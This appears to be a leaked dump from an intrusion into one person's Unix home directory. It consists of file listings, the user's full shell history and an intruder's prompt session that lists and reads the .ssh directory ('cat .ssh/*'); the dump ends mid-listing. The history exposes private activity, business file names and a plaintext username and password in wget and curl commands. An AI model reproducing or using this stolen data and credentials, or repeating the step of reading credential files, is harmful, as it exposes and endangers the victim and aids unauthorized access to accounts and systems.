/usr/home/effugas/mail/RouteSec -rw-r--r-- 1 effugas wheel 1352443 Mar 1 2008 Secret of Mana.zip -rw------- 1 effugas wheel 144765683 Jul 26 2006 Sent -rw------- 1 effugas wheel 68609225 Jul 25 2005 Sent Items -rw-r--r-- 1 effugas wheel 0 Sep 25 2005 Spam -rw-r--r-- 1 effugas wheel 55823056 Aug 10 2006 Trash drwxr-xr-x 2 effugas wheel 512 Oct 28 2005 ack drwxr-xr-x 2 effugas wheel 1024 Aug 8 2007 airhook-2 -rw-r--r-- 1 effugas wheel 28282 Apr 14 2003 airhook-2.tar.gz drwxr-xr-x 2 effugas wheel 512 Sep 8 2008 ap drwxr-xr-x 2 effugas wheel 1536 Feb 21 2008 arse -rw-r--r-- 1 effugas wheel 614 Jan 19 2005 authorized_keys -rw-r--r-- 1 effugas wheel 8048 Jan 23 2006 av2.txt -rw-r--r-- 1 effugas wheel 2641 Oct 6 2006 back.pem drwxr-xr-x 2 effugas wheel 1024 Jul 25 2006 bin -rw-r--r-- 1 effugas wheel 1801 Feb 23 2008 boing_seq.txt -rwx------ 1 effugas wheel 214576 Jul 25 2006 bplex_0_dev-src.gz -rw-r--r-- 1 effugas wheel 1662 Sep 8 2008 browserRedirect?url=itms%3A%2F%2Fax.phobos.apple.com.edgesuite.net%2FWebObjects%2FMZStore.woa%2Fwa%2FviewGenre%3Fid%3D35 drwxr-xr-x 2 effugas wheel 512 Jun 11 2006 ca drwxr-xr-x 2 effugas wheel 512 Sep 24 2006 cl drwxr-xr-x 60 effugas wheel 4096 Jul 6 2008 content drwxrwxrwx 2 effugas wheel 512 Jul 8 2008 db -rw-r--r-- 1 effugas wheel 963360 Sep 26 2005 db.dump -rw------- 1 effugas wheel 2416 Apr 27 13:07 dead.letter -rw-r--r-- 1 effugas wheel 718 Feb 22 2008 del.txt -rw-r--r-- 1 effugas wheel 4196 Feb 23 2008 del_seq.txt -rw-r--r-- 1 effugas wheel 4188 Feb 23 2008 del_ts.txt -rw-r--r-- 1 effugas wheel 10980 Sep 19 2006 dell_ssl2.txt -rw------- 1 effugas wheel 815104 Feb 11 2008 dig.core drwxr-xr-x 2 effugas wheel 1024 Jul 30 2006 dissoc-0.1 -rw-r--r-- 1 effugas wheel 51652 Jul 2 2001 dissoc-0.1.tar.gz -rw-r--r-- 1 effugas wheel 193 Oct 4 2006 distinfo -rwx------ 1 effugas wheel 7211132 Mar 15 2008 dk2_cli.pcap drwxr-xr-x 33 effugas wheel 3584 Jul 13 11:47 dl -rw-r--r-- 1 effugas wheel 4338 Mar 30 2005 dns.cap -rw-r--r-- 1 effugas wheel 
4338 Apr 13 15:23 dns.pcap -rwx------ 1 effugas wheel 3793316 Jun 15 2006 domain_login_esp.cap drwxr-xr-x 2 effugas wheel 512 Dec 23 2008 dprint -rw-r--r-- 1 effugas wheel 615112704 Nov 5 2006 en_winxp_pro_with_sp2.iso -rw-r--r-- 1 effugas wheel 1967 Feb 23 2008 fark_seq.txt -rw-r--r-- 1 effugas wheel 1984 Feb 23 2008 fark_ts.txt drwxr-xr-x 2 effugas wheel 512 Oct 4 2006 files -rw------- 1 effugas jb 209744 Sep 25 2005 filtered -rw------- 1 effugas wheel 37106364 Sep 26 2005 fire_inbox -rw-r--r-- 1 effugas wheel 7385211 Oct 28 2005 foo.pgp -rw-r--r-- 1 effugas wheel 10485784 Jun 19 2006 foo.xml -rw-r--r-- 1 effugas wheel 12920 Feb 22 2008 g_seq.txt -rw-r--r-- 1 effugas wheel 12848 Feb 22 2008 g_ts.txt -rw------- 1 effugas jb 2909341 Jan 12 2006 gah drwxr-xr-x 9 effugas wheel 1536 Aug 11 2005 gaim-1.5.0 -rw-r--r-- 1 effugas wheel 6123237 Aug 11 2005 gaim-1.5.0.tar.bz2 -rw------- 1 effugas wheel 7999488 Sep 29 2005 gaim.core -rw-r--r-- 1 effugas wheel 1588 Jan 1 2006 ghet_ip.c drwxrwxr-x 2 effugas wheel 512 Sep 30 2005 ghetto drwxr-xr-x 2 effugas wheel 512 Sep 25 2005 gml -rwxr-xr-x 1 effugas wheel 3395 Jun 17 2004 gml.py drwxr-xr-x 2 effugas wheel 512 Aug 23 2007 haxedit -rwx------ 1 effugas wheel 40960 Aug 27 2007 haxedit.tgz -rwxr-xr-x 1 effugas wheel 5312 Apr 6 14:20 heh -rw-r--r-- 1 effugas wheel 168 Apr 6 14:20 heh.cpp drwxr-xr-x 2 effugas wheel 512 Apr 26 00:32 hmm -rw-r--r-- 1 effugas wheel 1636602 Oct 28 2005 hmm.txt -rw-r--r-- 1 effugas wheel 2200 Jan 21 2008 hoho.txt -rw-r--r-- 1 effugas wheel 15748938 Nov 24 2007 huh_shai.gz drwxr-xr-x 5 effugas wheel 512 Jan 24 2006 imgSeek-0.8.6 -rw-r--r-- 1 effugas wheel 396056 Nov 14 2006 imgSeek-0.8.6.tar.bz2 -rw-r--r-- 1 effugas wheel 618624 Aug 12 2007 imsi-capture_phonecrypt_secured.wav -rw-r--r-- 1 effugas wheel 74086 Jun 10 2006 index.php -rw-r--r-- 1 effugas wheel 36115 Oct 5 2006 index.txt -rwxr-xr-x 1 effugas wheel 2739 Nov 7 2005 info_bot.pl drwxr-xr-x 2 effugas wheel 133120 Dec 5 2006 is -rw-r--r-- 1 
effugas wheel 43 May 15 2007 isf.gif -rw-r--r-- 1 effugas wheel 43 May 15 2007 isf.gif.1 -rw-r--r-- 1 effugas wheel 43 May 15 2007 isf.gif.2 -rw-r--r-- 1 effugas wheel 43 May 15 2007 isf.gif.3 -rw-r--r-- 1 effugas wheel 764567 Nov 26 2007 jm.zone drwxr-xr-x 2 effugas wheel 512 Oct 8 2007 johnny -rw-r--r-- 1 effugas wheel 0 Sep 8 2008 known_hosts drwxr-xr-x 2 effugas wheel 512 Mar 8 2005 lib drwxr-xr-x 7 effugas wheel 1024 Aug 29 2008 libspf2-1.2.5 -rw-r--r-- 1 effugas wheel 517945 Feb 23 2005 libspf2-1.2.5.tar.gz -rwx------ 1 effugas wheel 3548321 Jan 21 2008 local3.log -rw-r--r-- 1 effugas wheel 166676 Feb 22 2008 log.bin -rw-r--r-- 1 effugas wheel 22722620 Dec 8 2005 log.txt -rw-r--r-- 1 effugas wheel 10763 Mar 29 18:48 login drwxr-xr-x 3 effugas wheel 2048 Dec 5 2006 m -rw-r--r-- 1 effugas wheel 182 Feb 28 2006 mae.txt drwxr-xr-x 3 effugas wheel 512 Jul 17 11:39 mail drwxrwxrwx 2 effugas jb 512 Dec 31 2005 mail_oh -rw-r--r-- 1 effugas wheel 2765 Jun 1 2008 mangle.c -rw------- 1 effugas jb 7385213 Oct 28 2005 mater.pgp -rw-r--r-- 1 effugas wheel 66 Oct 28 2005 mater.pgp.2 -rwxr-xr-x 1 effugas wheel 4961 Apr 14 17:31 mem -rw-r--r-- 1 effugas wheel 231 Apr 14 17:31 mem.c -rw-r--r-- 1 effugas wheel 1002 Jul 6 2008 migrate.pl drwxr-xr-x 2 effugas wheel 512 Jan 5 2008 mov drwxr-xr-x 7 effugas wheel 512 Sep 29 2005 msn drwxr-xr-x 2 effugas wheel 512 Sep 29 2005 msn-bot -rw-r--r-- 1 effugas wheel 16973 Jul 16 2003 msn-bot.zip drwxr-xr-x 2 effugas wheel 512 Jan 13 2006 music drwxr-xr-x 4 effugas wheel 4163072 Feb 2 2007 mypix -rw-r--r-- 1 effugas wheel 7096 Feb 22 2008 mys.txt -rw-r--r-- 1 effugas wheel 11102 Feb 23 2008 mys_seq.txt -rw-r--r-- 1 effugas wheel 1032 Feb 23 2008 mys_ts.txt drwxr-xr-x 7 effugas wheel 1024 Feb 13 2007 netcat-0.7.1 -rwx------ 1 effugas wheel 398872 Feb 13 2007 netcat-0.7.1.tar.gz drwxr-xr-x 2 effugas wheel 512 Jun 5 2007 new -rw-r--r-- 1 effugas wheel 0 Jun 11 2006 newcert.pem -rw-r--r-- 1 effugas wheel 1180 Jun 11 2006 newreq.cer -rw-r--r-- 1 
effugas wheel 1180 Jun 11 2006 newreq.pem -rwxr-xr-x 1 effugas wheel 10371 Nov 15 2006 nomde.pl drwxr-xr-x 5 effugas wheel 512 Sep 17 2004 ophcrack_1_0a -rw-r--r-- 1 effugas wheel 5114862 Sep 17 2004 ophcrack_1_0a.zip -rw-r--r-- 1 effugas wheel 139283 Jan 10 2006 out.txt -rw------- 1 effugas jb 138418 Sep 28 2005 penn -rw------- 1 root wheel 999878656 Nov 25 2008 perl5.8.8.core -rw------- 1 effugas wheel 91009024 Jan 26 17:29 pine.core drwxr-xr-x 3 effugas wheel 58368 Feb 2 2007 pix drwxr-xr-x 5 effugas wheel 512 Jan 26 2007 pix2 -rw-r--r-- 1 effugas wheel 554 Oct 4 2006 pkg-descr -rw-r--r-- 1 effugas wheel 853 Oct 4 2006 pkg-plist drwxr-xr-x 3 effugas wheel 512 Jun 5 2007 s4 -rw-r--r-- 1 effugas wheel 378156 Mar 14 2006 scapy.py drwxr-xr-x 8 effugas wheel 2560 Oct 8 2006 screen-4.0.2 -rw-r--r-- 1 effugas wheel 840519 Jan 27 2004 screen-4.0.2.tar.gz drwxr-xr-x 3 effugas wheel 512 Sep 27 2005 sdba -rwxr-xr-x 1 effugas wheel 486449 Jul 12 2006 sequitur_simple.exe drwxr-xr-x 2 effugas wheel 512 Feb 6 14:10 shmoo -rw-r--r-- 1 effugas wheel 387800 Feb 13 2007 socat-1.5.0.0.tar.gz -rw-r--r-- 1 effugas wheel 0 Dec 30 2005 spam_first drwxr-xr-x 2 effugas wheel 2560 Jul 25 2006 src -rw-r--r-- 1 effugas wheel 144 Sep 27 2005 subcheck.pl -rw-rw---- 1 effugas mail 148812841 Dec 30 2005 superchunk_1 -rw-rw---- 1 effugas mail 7489304 Dec 31 2005 superchunk_2 drwxr-xr-x 2 effugas wheel 512 Apr 20 19:32 swap -rw-r--r-- 1 effugas wheel 117 Jul 6 2008 tcheck.pl -rw-r--r-- 1 effugas wheel 1025 Feb 22 2008 test.txt drwxr-xr-x 2 effugas wheel 512 Apr 3 15:48 tmp -rw-r--r-- 1 root wheel 221202 Nov 25 2008 tmp1 -rw-r--r-- 1 root wheel 225530 Nov 25 2008 tmp2 drwxr-xr-x 2 effugas wheel 512 Nov 11 2008 tor-audit drwxr-xr-x 5 effugas wheel 1536 Jun 23 2007 trunk -rwxr-xr-x 1 effugas wheel 7232 Feb 13 2007 udpfwd -rw-r--r-- 1 effugas wheel 3431 Feb 13 2007 udpfwd.c drwxr-xr-x 20 effugas wheel 1536 Jun 29 10:16 unbound-1.3.0 -rw-r--r-- 1 effugas wheel 4059848 Jun 11 04:00 
unbound-latest.tar.gz -rw-r--r-- 1 effugas wheel 87 May 17 2007 url.txt drwxr-xr-x 2 effugas wheel 512 Sep 20 2005 walker-3.8 -rw-r--r-- 1 effugas wheel 18478 Sep 20 2005 walker-3.8.tar.gz -rwx------ 1 effugas wheel 24256 Jun 18 2006 webdav.txt -rwx------ 1 effugas wheel 21710 Jun 18 2006 webdav.xml drwxr-xr-x 2 effugas wheel 512 Nov 7 2005 wtf -rw-r--r-- 1 effugas wheel 92 May 30 2007 wtf.pl drwxr-xr-x 2 effugas wheel 1024 Jul 28 2006 xray -rw-r--r-- 1 effugas wheel 12840 Feb 23 2008 yahoo_seq.txt -rw-r--r-- 1 effugas wheel 13002 Feb 23 2008 yahoo_ts.txt %cat .bash_history ctorrent -h ctorrent Heroes_-_Season_3_\(Volume_Three_\[3\]___Villains_-_Complete\)_-_S03.4583677.TPB.torrent cd .. cd grab2 ls ctorrent 1483862 ls wget http://www.mininova.org/get/2072701 ctorrent 2072 ctorrent 2072701 rm -rf Family\ Guy\ Season\ 4/ wget http://www.mininova.org/get/2087297 ctorrent 2087297 pine pine pine pine pine pine pine pine pine pine pine pine pine cd ls -l ND* ls -l *doc cp Doxpara-NDT\ term\ sheet.doc /export/www/colo.doxpara.com/ pine pine pine cd heh ls cd hmm ls cd .. find . | grep -i txt ls find . | grep -i heh cd swap/ ls more heh.txt more heh.txt cd cd heh ls find . 
| grep -i heh cd swap cat heh.txt cd /export/www/colo.doxpara.com/ wget http://www.state.gov/documents/organization/79958.pdf screen -D -R screen -D -R ~# ~# screen -D -R screen -D -R screen D -R screen -D -R screen -D -R screen -D -R screen -D -R screen -D -R pine kjhkjhdkjshfksjdf pine sdfsdf whois doxdns1.com links http://www.google.com/url?sa=t&source=web&ct=res&cd=1&url=http%3A%2F%2Fen.wikipedia.org%2Fwiki%2FTriple_DES&ei=PiwmSqv8JqHYswPIm-SbBg&rct=j&q=3des&usg=AFQjCNGi3G2cND5EvYton6SvtELgpvoDag links 'http://www.google.com/url?sa=t&source=web&ct=res&cd=1&url=http%3A%2F%2Fen.wikipedia.org%2Fwiki%2FTriple_DES&ei=PiwmSqv8JqHYswPIm-SbBg&rct=j&q=3des&usg=AFQjCNGi3G2cND5EvYton6SvtELgpvoDag' lynx 'http://www.google.com/url?sa=t&source=web&ct=res&cd=1&url=http%3A%2F%2Fen.wikipedia.org%2Fwiki%2FTriple_DES&ei=PiwmSqv8JqHYswPIm-SbBg&rct=j&q=3des&usg=AFQjCNGi3G2cND5EvYton6SvtELgpvoDag' cd dl ls find . | grep -i ssl cd data ls ls -l ssl* more dell_ more dell_ssl.txt mysql mysql db mysql test ls cd .. find . 
| grep -i ssl dig @deluvian.doxpara.com _sshfp._autopop.mail.doxpara.com sshfp dig @deluvian.doxpara.com _sslfp._autopop.mail.doxpara.com cert dig @deluvian.doxpara.com _sslfp._autopop.mail.microsoft.com cert dig @deluvian.doxpara.com +dnssec _sshfp._autopop.mail.doxpara.com sshfp dig @deluvian.doxpara.com _sslfp._autopop.mail.microsoft.com cert dig @deluvian.doxpara.com dan.doxpara.com cert dig @deluvian.doxpara.com dan.doxpara.com cert +dnssec dig @deluvian.doxpara.com dan.doxpara.com cert +dnssec pine pine ~ fgfdgdfgdg cd /export/www/colo.doxpara.com/ ls vim etweet.pl vi etweet.pl screen -D -R nslookup -type=txt g.iranelection.toorrr.com nslookup -type=txt g.iranelection.toorrr.com nslookup -type=txt g.iranelection.toorrr.com nslookup -type=txt g.iranelection.toorrr.com nslookup -type=txt g.iranelection.toorrr.com nslookup -type=txt g.iranelection.toorrr.com nslookup -type=txt g.iranelection.toorrr.com 209.200.168.66 dig @209.200.168.66 g.iranelection.toorrr.com txt dig @209.200.168.66 g.iranelection.toorrr.com txt dig g.iranelection.toorrr.com txt dig g.iranelection.toorrr.com txt dig g.iranelection.toorrr.com txt dig g.iranelection.toorrr.com txt dig g.iranelection.toorrr.com txt dig g.iranelection.toorrr.com txt ping www.google.com ping www.failblog.com ping www.cnn.com ping www.metblogs.com netstat -an | grep -i 443 dig microsoft.com mx dig boingboing.net mx nc mx1.emailsrvr.com. 25 telnet mx1.emailsrvr.com 25 telnet mx1.emailsrvr.com 25 telnet mx1.emailsrvr.com 25 telnet mx1.emailsrvr.com 25 dig +short boingboing.net mx whois ohairan.com nc mail.ohairan.com nc mail.ohairan.com 25 nc mail.ohairan.com 25 irc BitchX whois 74.125.67.100 dig . dig . any dig A.ROOT-SERVERS.NET. wget http://www.unbound.net/downloads/unbound-latest.tar.gz tar xzvf unbound-latest.tar.gz cd unbound-1.3.0/ ./configure make gmake cat > sample.c gcc -I ./libunbound -L . -o sample sample.c gcc -I ./libunbound -L . -o sample sample.c -lunbound -lcrypto gcc -I ./libunbound -L . 
-o sample sample.c libunboundla -lcrypto gcc -I ./libunbound -L . -o sample sample.c libunbound.la -lcrypto gcc -I ./libunbound -L . -o sample sample.c libunbound.la -lcrypto gcc -I ./libunbound -L . -o sample sample.c -lunbound -lcrypto gcc -I ./libunbound -L /usr/local/lib -o sample sample.c -lunbound -lcrypto ./sample fg vim sample.c vi sample.c cat > root.hints cat > root.keys ./sample gcc -I ./libunbound -L /usr/local/lib -o sample sample.c -lunbound -lcrypto ./sample time ./sample dig +dnssec www.afilias.org fg vim sample.c vi sample.c gcc -I ./libunbound -L /usr/local/lib -o sample sample.c -lunbound -lcrypto ./sample ./sample www.news.com ./sample www.fark.com ./sample www.dnssec.se fg ./sample www.dnssec.se vim sample.c vi sample.c gcc -I ./libunbound -L /usr/local/lib -o sample sample.c -lunbound -lcrypto ./sample www.dnssec.se ./sample www.afilias.org ./sample c0.org.afilias-nst.info. ./sample dnssec.org ./sample 166.68.193.in-addr.arpa. ./sample www.whitehouse.gov ./sample www.highinberlin.de ./sample www.dnssec.se ./sample www.dnssec.se ./sample www.dnssec.se ./sample www.iis.se ./sample dotgov.dnsops.gov ./sample www.iana.org ./sample www.fark.com ./sample gov ./sample org ./sample org ./sample afilias.org ./sample dnssec.org ./sample org ./sample www.dynamicnetworkservices.com ./sample www.dnsops.gov ./sample version.dnssec.se cd wget http://josefsson.org/walker/releases/walker-3.8.tar.gz tar xzvf walker-3.8.tar.gz cd walker-3.8 ./walker ./walker dnssec.se ./walker se ./walker nonex.dnssec.se cd cd unbound- cd unbound-1.3.0/ ./sample nonex.dnssec.se ./sample www.stern.de ./sample www.anon-proxy.de ./sample de ./sample se ./sample gov ./sample usgs.gov ./sample gq ./sample mil dig +dnssec @204.61.216.37 foo dig +dnssec @204.61.216.37 foo.com dig +dnssec @204.61.216.37 coop dig +dnssec @204.61.216.37 cr dig +dnssec @204.61.216.37 gov ./sample gov dig +dnssec @204.61.216.37 gov dig +dnssec @204.61.216.37 org dig +dnssec @204.61.216.37 org dig +dnssec 
@204.61.216.37 B2.ORG.AFILIAS-NST.org. ./sample B2.ORG.AFILIAS-NST.org. dig @B0.ORG.AFILIAS-NST.org. dig +secure @B0.ORG.AFILIAS-NST.org. dig +dnssec @B0.ORG.AFILIAS-NST.org. dig +dnssec @B0.ORG.AFILIAS-NST.org. $B0.ORG.AFILIAS-NST.org dig +dnssec @B0.ORG.AFILIAS-NST.org. org dig +dnssec @B0.ORG.AFILIAS-NST.org. www.afilias.org ./configure --help ./configure --help | grep -i nsec find . | xargs grep nsec3 cd cd walker-3.8 ./walker ./walker www.dnssec.se ./walker dnssec.se ./walker se cd .. cd unbound- cd unbound-1.3.0/ ./sample 0-3.se. ./sample www.0-3.se. cd .. cd walker-3.8 ./walker gov ./walker de ./walker gov ./walker com ./walker org dig +dnssec +trace www.dnssec.se dig @209.200.168.67 foo.com dig +dnssec @209.200.168.67 foo.com dig +dnssec @209.200.168.67 foo.com dig +dnssec @209.200.168.67 foo.com dnskey cd sample cd unbound-1.3.0/ ls mkdir real mv root* real cat real/root.keys cat > root.keys cat real/root.hints vim root.hints vi root.hints ./sample foo.com ./sample foo.com ./sample www.cnn.com ./sample www.doxpara.com dig +dnssec @209.200.168.67 foo.com dig +dnssec @209.200.168.67 dnskey dig +dnssec @209.200.168.67 dnskey dig +dnssec @209.200.168.67 dnskey dig +dnssec @209.200.168.67 cnn.com dnskey date ntpdate ./sample www.doxpara.com ./sample www.doxpara.com ./sample www.doxpara.com dig @209.200.168.67 . dig @209.200.168.67 . dig @209.200.168.67 . dig @209.200.168.67 . dig @209.200.168.67 . dig @209.200.168.67 . dig @209.200.168.67 . ./sample www.doxpara.com find . | xargs grep verbose find . | xargs grep "root-hints" vim ./util/configlexer.lex vi ./util/configlexer.lex vim sample.c vi sample.c gcc -I ./libunbound -L . -o sample sample.c -lunbound -lcrypto gcc -I ./libunbound -L . -o sample sample.c -lunbound -lcrypto gcc -o sample sample.c -lunbound -lcrypto gcc -I ./libunbound -L /usr/local/lib -o sample sample.c -lunbound -lcrypto ./sample www.doxpara.com ./sample www.doxpara.com ./sample www.doxpara.com dig @209.200.168.67 dakadns. 
DNSKEY dig @209.200.168.67 dakadns. DNSKEY dig @209.200.168.67 dakadns. DNSKEY dig @209.200.168.67 dakadns. DNSKEY ./sample www.doxpara.com ./sample www.doxpara.com dig dnssec.se dnskey dig +dnssec dnssec.se dnskey dig +dnssec dnssec.se dnskey dig +dnssec se dig +trace +dnssec www.dnssec.se dig +trace +dnssec www.dnssec.se dnskey dig afilias.org dig afilias.org +trace dig afilias.org +trace dnskey dig +trace +dnssec www.dnssec.se dnskey dig +trace +dnssec dnssec.se dnskey drill ls find . | grep -i drill cd ldns-src ./drill/ cd drill/ ls make cd .. make gmake ls find . | grep -i drill ./configure drill make gmake make drill gmake drill ls drill cd drill/ ls gmake ./configure gmake ./drill ./drill ./drill www.dnssec.se ./drill www.dnssec.se -h ./drill +dnssec www.dnssec.se ./drill -j www.dnssec.se ./drill -h www.dnssec.se ./drill -D www.dnssec.se ./drill -T -D www.dnssec.se ./drill -T -D www.dnssec.se ./drill -T -D -h ./drill @209.200.168.67 -D www.cnn.com ./drill @209.200.168.67 -D www.cnn.com DNSKEY ./drill @209.200.168.67 -D www.cnn.com ./drill @209.200.168.67 -D -T www.cnn.com ./drill @209.200.168.67 -k ~/unbound-1.3.0/root.keys -D -T www.cnn.com ./drill @209.200.168.67 -k ~/unbound-1.3.0/root.keys -D -T www.cnn.com ./drill @209.200.168.67 -k ~/unbound-1.3.0/root.keys www.cnn.com ./drill @209.200.168.67 -k ~/unbound-1.3.0/root.keys www.cnn.com -D ./drill @209.200.168.67 -k ~/unbound-1.3.0/root.keys -DT www.cnn.com ./drill -h ./drill -r ~/unbound-1.3.0/root.hints 7 -k ~/unbound-1.3.0/root.keys -DT www.cnn.com ./drill -r ~/unbound-1.3.0/root.hints 7 -k ~/unbound-1.3.0/root.keys -DT www.cnn.com ./drill -r ~/unbound-1.3.0/root.hints 7 -k ~/unbound-1.3.0/root.keys -DT www.cnn.com ./drill -h cd .. cd .. 
drill drill -r root.hints drill -r root.hints drill -r root.hints cat root.hints drill -r root.hints drill -r ./root.hints drill drill -h drill -r ./root.hints -T drill -r ./root.hints -T www.cnn.com drill -r ./root.hints -DT www.cnn.com drill -r ./root.hints -k root.keys -DT www.cnn.com drill -r ./root.hints -k root.keys -DT www.cnn.com drill -r ./root.hints -k root.keys -DT www.cnn.com drill -r ./root.hints -k root.keys -DT www.cnn.com drill -r ./root.hints -k root.keys -DT www.cnn.com drill -r ./real/root.hints -k real/root.keys www.dnssec.se drill -r ./real/root.hints -k real/root.keys www.dnssec.se drill -r ./real/root.hints -k ./real/root.keys www.dnssec.se cat real/root.keys cd real/ ls cp root.keys root.keys.orig vim root.keys vi root.keys cd .. drill -r ./real/root.hints -k ./real/root.keys www.dnssec.se cd real/ ls cat root.keys cat root.keys | tr -d \n cat root.keys | tr -d '\n' cat root.keys | tr -d '\n' | tr -s ' ' cat root.keys | tr -d '\n' | tr -s ' ' > real ls mv real root.keys vim root.keys vi root.keys cd .. 
drill -r ./real/root.hints -k ./real/root.keys www.dnssec.se drill -DT -r ./real/root.hints -k ./real/root.keys www.dnssec.se drill -DT -r ./real/root.hints -k ./real/root.keys www.dnssec.se drill -DT -r ./real/root.hints -k ./real/root.keys www.dnssec.se ls cat root.keys cat root.hints drill -DT -r root.hints -k ./real/root.keys www.dnssec.se drill -DT -r root.hints -k root.keys www.dnssec.se drill -DT -r root.hints -k root.keys www.dnssec.se drill -DT -r root.hints -k root.keys www.dnssec.se drill -DT -r root.hints -k root.keys www.dnssec.se drill -DT -r root.hints -k root.keys $RANDOM.doxpara.com drill -DT -r root.hints -k root.keys $RANDOM.doxpara.com dig @209.200.168.67 F.ROOT-SERVERS.NET dig @209.200.168.67 F.ROOT-SERVERS.NET dig @209.200.168.67 F.ROOT-SERVERS.NET dig @209.200.168.67 F.ROOT-SERVERS.NET dig @209.200.168.67 F.ROOT-SERVERS.NET dig @209.200.168.67 F.ROOT-SERVERS.NET dig @209.200.168.67 F.ROOT-SERVERS.NET dig @209.200.168.67 F.ROOT-SERVERS.NET dig @209.200.168.67 F.ROOT-SERVERS.NET dig @209.200.168.67 F.ROOT-SERVERS.NET dig @209.200.168.67 F.ROOT-SERVERS.NET drill -DT -r root.hints -k root.keys $RANDOM.doxpara.com drill -DT -r root.hints -k root.keys $RANDOM.doxpara.com cat real/root.hints dig @208.77.188.32 L.ROOT-SERVERS.NET dig @208.77.188.32 L.ROOT-SERVERS.NET +dnssec dig @208.77.188.32 L.ROOT-SERVERS.NET +dnssec dig @208.77.188.32 L.ROOT-SERVERS.NET +dnssec dig @208.77.188.32 L.ROOT-SERVERS.NET +dnssec ls cd real/ ls ../sample www.dnssec.se ../sample www.dnssec.se 2> /dev/null ../sample www.dnssec.se 2> /dev/null ../sample www.dnssec.se 2> /dev/null dig a.root-servers.net cd cd dl wget http://www.watters.ws/rpms/roms/snes/Secret%20of%20Mana.zip cd dl mkdir game cd game wget -r -l1 http://www.watters.ws/rpms/roms/snes/ airhook cd airhook-2 ./airproxy -l 12000 -o 22 ./airproxy -l 12000 -o 22 ./airproxy -l 12022 -o 22 cd dl mkdir new mkdir n cd n cat > goget.txt wget --no-check-certificate --user=effugas.2 --password=fuck.2 -i goget.txt for i in 
`cat goget.txt`; do curl -k -u effugas.2:fuck.2 -O $i; done ls rm *avi ls wget --no-check-certificate --user=effugas2 --password=fuck.2 -i goget.txt pwd fg ls rm * cd /export/www/colo.doxpara.com/ cat > dns.txt ls -l dns.txt pine cd mv Nothing\ but\ Net\ -\ 2009\ Internet\ Investment\ Guide.pdf /export/www/colo.doxpara.com/net.pdf more netcat-0.7.1 cd /export/www/colo. cd /export/www/colo.doxpara.com/ more net.pdf %ls -la .ssh/ total 36 drwxr-xr-x 2 effugas wheel 512 Nov 9 2005 . drwx------ 68 effugas wheel 5120 Jul 17 11:43 .. -rw-r--r-- 1 effugas wheel 1222 Sep 8 2008 authorized_keys -rw-r--r-- 1 effugas wheel 1211 Sep 8 2008 authorized_keys2 -rw-r--r-- 1 effugas wheel 4749 Sep 8 2008 known_hosts %cat .ssh/*
%ls -la total 7437192 -rw-r--r-- 1 effugas wheel 53 Mar 10 2005 +COMMENT -rw-r--r-- 1 effugas wheel 490 Mar 10 2005 +CONTENTS -rw-r--r-- 1 effugas wheel 307 Mar 10 2005 +DESC -r--r--r-- 1 effugas wheel 13080 Mar 10 2005 +MTREE_DIRS -rw-r--r-- 1 effugas wheel 1299747 Jul 16 2005 - -rw-r--r-- 1 effugas wheel 0 Sep 28 2005 -u drwx------ 68 effugas wheel 5120 Jul 17 11:43 . drwxr-xr-x 33 root wheel 1024 Jul 13 14:24 .. -rw------- 1 effugas wheel 434 Jan 13 2008 .Xauthority -rw-r--r-- 1 effugas wheel 0 Oct 24 2006 .addressbook -rw------- 1 effugas wheel 2285 Oct 24 2006 .addressbook.lu -rw------- 1 effugas wheel 12839 Jul 18 06:18 .bash_history drwxr-xr-x 7 effugas wheel 512 Jun 13 2008 .bittorrent drwxr-xr-x 6 effugas wheel 512 Feb 6 14:05 .cpan drwx------ 2 effugas wheel 512 Apr 23 2005 .elinks drwx------ 2 effugas jb 512 Sep 24 2005 .elm -rw-r--r-- 1 effugas wheel 63520 Sep 29 2005 .fonts.cache-1 drwx------ 4 effugas wheel 512 Feb 15 2006 .gaim drwx------ 2 effugas wheel 512 Mar 19 00:41 .gnupg -rw------- 1 effugas wheel 302298 Dec 30 2005 .grepmail-cache -rw------- 1 effugas wheel 67 Jul 6 2008 .lesshst -rw-r--r-- 1 effugas wheel 133 Jun 10 2006 .mailboxlist -rw------- 1 effugas wheel 7465 Jun 3 06:23 .mysql_history -rw------- 1 effugas wheel 221 Sep 10 2004 .nessusrc -rw-r--r-- 1 effugas wheel 28672 Sep 2 2004 .nomde_ex.pl.swo -rw-r--r-- 1 effugas wheel 16384 Sep 7 2004 .nomde_ex.pl.swp drwx------ 8 effugas wheel 512 Dec 5 2005 .openwebmail -rw------- 1 effugas wheel 1592 Apr 20 19:28 .pine-interrupted-mail -rw------- 1 effugas wheel 17165 Jul 17 11:38 .pinerc -rw-r--r-- 1 effugas wheel 816 Jan 8 2006 .procmailrc -rw------- 1 effugas wheel 1024 Jan 7 2009 .rnd -rw-r--r-- 1 effugas wheel 12 Apr 4 2005 .slirprc drwx------ 2 effugas wheel 512 Jul 12 14:02 .spamassassin drwxr-xr-x 2 effugas wheel 512 Nov 9 2005 .ssh drwxr-xr-x 3 effugas wheel 512 Jun 23 2007
.subversion -rw------- 1 effugas jb 256 Dec 5 2005 .vacation.msg drwxr-xr-x 2 effugas wheel 512 Sep 29 2005 .vnc -rw-r--r-- 1 effugas wheel 5714 Sep 5 2007 110eclipse.jpg -rw-r--r-- 1 effugas wheel 5714 Sep 5 2007 110eclipse.jpg.1 -rw-r--r-- 1 effugas wheel 4170702 Dec 17 2006 17-Day tripper.mp3 -rw-r--r-- 1 effugas wheel 18163 Oct 10 2006 399299 drwx------ 11 effugas wheel 2048 Jan 14 2007 4 -rw------- 1 effugas wheel 1244999 Jul 25 2005 Admin Noise -rwx------ 1 effugas wheel 19253 May 20 2007 Alpha Man Conversation & Persuasion.torrent drwxr-xr-x 7 effugas wheel 512 Jun 14 2008 BitTorrent Downloads drwxr-xr-x 11 root wheel 1024 Jan 13 2007 BitTorrent-4.20.9 -rw------- 1 effugas wheel 9215553 Aug 12 2006 CCCP -rw-r--r-- 1 effugas wheel 136192 Aug 12 2007 Cingular_Customized APN info and price sheet.doc -rw------- 1 effugas wheel 11072756 Sep 15 2006 Crypto -rwx------ 1 effugas wheel 18865 Nov 4 2006 David X Seduction and Relationships Seminar.torrent -rw-r--r-- 1 effugas wheel 64512 Jan 6 2006 DiogeNeS.doc -rw-r--r-- 1 effugas wheel 27648 May 10 13:01 Doxpara-NDT term sheet.doc -rw------- 1 effugas wheel 425406 Jul 25 2005 Drafts -rw-r--r-- 1 effugas wheel 27648 Aug 12 2007 Encryption sw_SecurStar info.doc lrwxr-xr-x 1 effugas wheel 29 Jan 8 2006 Funsec -> /usr/home/effugas/mail/Funsec -rw------- 1 effugas mail 10369669 Sep 25 2005 Gap -rw------- 1 effugas wheel 